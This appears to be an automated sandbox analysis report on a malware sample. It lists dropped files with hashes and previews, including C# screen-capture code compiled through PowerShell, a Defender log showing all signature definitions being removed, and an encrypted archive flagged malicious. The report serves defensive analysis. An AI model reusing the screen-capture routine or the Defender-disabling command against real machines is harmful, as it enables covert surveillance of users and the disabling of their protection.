SHA-512:	BBE5A0D7C7E1F7BA4A7340C83389D6E50E3E6A33E8576D590F9E78E8B742AE57B6FD2D601244064EA4EBD0F42748A137A2AF2CC0CC8DDAFAFD5C26D20EAC49B9
Malicious:	false
Reputation:	unknown
Preview:	.,.z.....................................;...{.......\|7......{A..............{A......{A..........{A].................o.x.....\|7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bound.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\bound.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.38575581059626
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1BakvoDLI4MWuPakEOsk7v:ML9E4KQ71qE4GIs0E4KD
MD5:	E918A9A81162ACCFD3E06E02E11CB6C8
SHA1:	10F02DAEDB20582256A5601EE8898CFA8DC2BDD5
SHA-256:	912110B9095CDC4B124444955DD3ABAEFFB7C309A242A4B05299A26EC9920A21
SHA-512:	78D9CABEFE698E54197D7D03ABC3AC36F3AAA2DE80CD79AD780B67324F36D7CA3560F642873E8C20F2BB27A9C892D9A2F21898E4B469FAFE35BA0FAEE8A7936A
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ??? ? ?\Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	352686
Entropy (8bit):	7.8663228229696935
Encrypted:	false
SSDEEP:	6144:tyYzTopvZ+GxuDfCRy37eMsZur079djA0KxjiNnNyrK/YWtcp5JlS2rYUIoLn7W4:tyYzTopHoDfQyF7wX7YjiNnNy2/YWtcV
MD5:	AC3AA6405754B7A695A050BF7F6F49B5
SHA1:	CFF99E0D1F1A7E924C50773A17662D79B9E43252
SHA-256:	665B19F3F263C696DEBF2739382D2313554946E0C51A96CB461964F3363C8C4D
SHA-512:	339D9A8794809E6CD9F6FA421F1B72BB5BCFE307A6D999D9EE9BBC0B2AED7026F083390CEA225F42280CC043CB8A461FAE5F2A6E0DC2D32365D3D2B36A59915E
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.e....9U.n....G.v...M..\|=...WRwGG.D..MU...[....#..$!.7..../....../.. .PN>..o.w.Z..:..BoF<..o..{...<..j.s...q.....8g=lxh.3...?.......?=.".A..z.......S.wp...S.^.s....F..D...L.?....'.....{.....t...4=j'N..[.d.....Sj.sJ._.wOJ..x.$...;.W..#.W.d_.Cglc3M.KwL....N...;..$..m."..../..uF.>u.^...>y.}.w..q...w..}.....L..S .h<s....7....z.9.W.D....~1%......~>).......}q..^A..7.....C...xO.^......&..O..w.......5...D9Gs..s.....Xsa.uC......;........7..v..[~..o.q7.o.!..qW..r8...(.y.9gdo..jo..aGh..1^.q...z..m.o..H....Z......wtb..xch.>.q..P?jk..h..`...b.....Q1..?.G..=\|[._.5d...j.mIc..w.1.....#w.Y1.'.Mb1..E^.......9..Socy.<.2..irn....q..l.Nl..;B....8......~.-.....S__...!.....![...sh.]b_[...5..h..?7b...c.'.Z[...\.1..+.X....g.^.`..u.8...zD.\|dm.>....gN@}tC..G,.......Z....i....7B,.X.Y.k..9..5c.Y....{...P.?.1...A..C.....0...9#..'........5h..?....X......^>....j.\|..17

C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Reputation:	unknown
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.331839308836444
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfuCx0WZEifuCL:V3ka6KOkqeFkOfuCxVEifuCL
MD5:	4082306060CC76AA12D28AD98A1855B1
SHA1:	C9BE416F1856542BC66A68840DDDD00EB3ECDE32
SHA-256:	89ACAC885BBD396F5EBF9D7275DD3EB1D6D77633D303AF07484369E6F7EF9BFA
SHA-512:	190FD2E7061E48CCB93279D97CAB36394DCFC41CDA0C0804AAF5287AE72AC866E3548954E3E25BB46EAF2AB7ABF8F6FAE610613E3747146B78B99756496818D0
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.0.cs"

C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1618447834248076
Encrypted:	false
SSDEEP:	48:6J7oEAtf0KhzBU/pDf6mtJ+N07pW1ulHa3rq:XNz0pWmGOjlK
MD5:	5FD91F4420F934B0D10B66EA3E8024CC
SHA1:	D5E6D62746BB111F96CCDC9D72D545D3A5162365
SHA-256:	952B103F8F977C29300750F517986459E1A78D43C90969ED84FC702F688AD4DC
SHA-512:	8F794FA206AA1E4B26848957E286164B900EF0CEA4C3A32E97A44CACCFCD2F2705A5DF78B84C5FB28BE65DDFE675264B47C61F58D797C253EE8D65F16CC09F08
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;.#g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1148
Entropy (8bit):	5.5013804524893155
Encrypted:	false
SSDEEP:	24:KJfWId3ka6KOkqeFkOfuCxVEifuCKKax5DqBVKVrdFAMBJTH:uWkka6NkqeFkyrHEurKK2DcVKdBJj
MD5:	4F6161A09B11C0F195426E93588E8643
SHA1:	958F76434E9AD38327E39D54808B6DED70E3ACBE
SHA-256:	78E076B615A5473B98A3BDE2407C886D1AED8F429CE763F3259399AC30ED7679
SHA-512:	4A9B5A7DFAD869DC7330C5E719DF8BB520A3DA116FF842EDC30EA7A4EA6D4C98BC199FE68A06EC45E2A4D032B22C67EA7B2F93505AB16F3AE77551763EFDA8D5
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer

C:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1012067769574267
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryVak7YnqqJPN5Dlq5J:+RI+ycuZhNHakSJPNnqX
MD5:	7D3276E342467D00F840618AC3963B7D
SHA1:	4C47931DA584C6CCAEC9B5850B02D28CF98FA92A
SHA-256:	29884563D0102BC62BA05E113B9D71905139FBFC926D1C8228EE094521ABFFD6
SHA-512:	D075CF2FDF4A9302DF9795687ED090D9D4A87B48748D4C26C2CDB6D406099433F21F1A1C365436C30A9FF50B847958C8268821E1EEAFB204BDCB8FFCC4390EDC
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.m.v.l.j.v.u.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.m.v.l.j.v.u.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\BfsYI.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	386142
Entropy (8bit):	7.999581261970029
Encrypted:	true
SSDEEP:	6144:XbLSLQCeZHOYWJWxdNqOFFQOLcBka6wddxTnhni19sploKlRGAZqAmu4wCn1WrC1:rmLQC9YZNqO0OwBrNdRnhec5GAZqT3nR
MD5:	2F45DD3873E02ED6B5DA3971C7D56F20
SHA1:	0885DE89B432F632EC4485A10E24F7229FCDE0D7
SHA-256:	8A47DDF65FC2E7439D8ABBAE0BD806326BAB4302FF66E361C65A3A927EFAD385
SHA-512:	7D67DFC10347221563F14FE243BB700151C0E58CF7F630517959C88E0125A4B9A642AA14A6637E093549F3D3C613E926525CEC4BADA21A604EAF1482A3387CAA
Malicious:	true
Reputation:	unknown
Preview:	Rar!....p?..!.....RLfk...#c./..]..T....#..i}..wk..R!.....8.S...\./0\|h_G;-n.....L#Y.o...I......V-)m.....a.^..-y..,7!!.Q'...Z..t.1...T.%m.L$H......E...V`Y..b..Ty......`..3E......!G.V.C.m..#n'.wlx".y...#..1....M......i.~x.yM...1$R+....5..HZyz.+...i..\|.t.:....T.L....j....kb..c..hfsR<..A......=_a.MJ.2G.......iAA..D.\q.8f1#.d4xars!7.Z.5..\.ofa.....t...N.W$.X...x.....MD..n..&..C..........c._\|8...l.%.).m...p`......b.n.p.... .&.Me....lG.>U....I...,....B./8..Q.UcM....P..&.x{.F.q.z.^.@.X<Q.}Z..Q.j!...kI.........-.W.W....}?.(..L......L.^_z..T;.).?..u..w.ap...]...s~E............j+cJ..@s..WI....w..A...`.pJ....z........G....-x.....b.....@..`......Ie.....R]..#W.gK=.h.k....F...q...9A.}.FE..\|.I_W.....H.~m,.v...\|.{..m.t....L... Y`.y........Jg......>....dc..6..f..6.4t.J..7.Q..o.....am'.FuO.%.Gg..E..i.R.o+.uP...0`n.;q...A. ..F...J.(..r..v..K_...N..>..n.l.m.~..6%".o.5..K.V..K........x.i$.2..e....?.$.....'cX..%.5C3!S..!q.WY...L....d......!H?. ....oz.......F

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1313708833287466
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrwtxIRk9+MlWlLehW51ICJtxMQI:QOaqdmOFdjrwjIW+kWResLIojMt
MD5:	ABC9C5EABEDC1A855A8A307CD62F6677
SHA1:	C89AE0226766D8BA2AE305DF157B72F05F9FDE1D
SHA-256:	97DED19E6520FE483C6D287F3790E426958F021540CD000E5E0758D907F0CDA5
SHA-512:	97377938EAA849803D18DEBB1105D7FC613E2C27D88D56CB8C27F4FCDC2870A7BBB03E7AF5CE637938319916E19A0E6C5BBCF07BA2DBA7D4D8CC158BA2EA8475
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 3.1. .. 2.0.2.4. .1.4.:.1.9.:.3.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. O.c.t. .. 3.1. .. 2.0.2.4. .1.4.:.1.9.:.3.7.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RESD934.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Oct 31 19:19:24 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.100532541584644
Encrypted:	false
SSDEEP:	24:HYFq9HhfuF6kODfH1wK9Gof+XNWI+ycuZhNHakSJPNnqS+d:4aW6n2KD641ulHa3rqSe
MD5:	04A39C03B5425E7D4AC01ACA980B3469
SHA1:	C42D3E164C5BD461FB21B12E0F1844A2A55AFBA4
SHA-256:	65B764770AF3BD40B36D87CA7299A13657480E9E46B5846499F0EFE57D168C5A
SHA-512:	95E0616CEC72D8CDE36477DB068A7031B47ADFE81F98D9ADAD1F414E93B55D3F775BE8B8AFA80620B1829FF164A34F304DAED75972222FBD12C48EE702E2EEA1
Malicious:	false
Reputation:	unknown
Preview:	L...<.#g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........R....c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP.................}2v.BF}..@a..;}..........4.......C:\Users\user\AppData\Local\Temp\RESD934.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.m.v.l.j.v.u.o...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49424
Entropy (8bit):	7.815740675307968
Encrypted:	false
SSDEEP:	768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
MD5:	58FC4C56F7F400DE210E98CCB8FDC4B2
SHA1:	12CB7EC39F3AF0947000295F4B50CBD6E7436554
SHA-256:	DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
SHA-512:	AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	7.834005148796091
Encrypted:	false
SSDEEP:	1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
MD5:	79879C679A12FAC03F472463BB8CEFF7
SHA1:	B530763123BD2C537313E5E41477B0ADC0DF3099
SHA-256:	8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
SHA-512:	CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120080
Entropy (8bit):	7.901857200989369
Encrypted:	false
SSDEEP:	3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
MD5:	21D27C95493C701DFF0206FF5F03941D
SHA1:	F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
SHA-256:	38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
SHA-512:	A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36112
Entropy (8bit):	7.6548425105220375
Encrypted:	false
SSDEEP:	768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
MD5:	D6F123C4453230743ADCC06211236BC0
SHA1:	9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
SHA-256:	7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
SHA-512:	F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................\|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88336
Entropy (8bit):	7.9108932581373015
Encrypted:	false
SSDEEP:	1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
MD5:	055EB9D91C42BB228A72BF5B7B77C0C8
SHA1:	5659B4A819455CF024755A493DB0952E1979A9CF
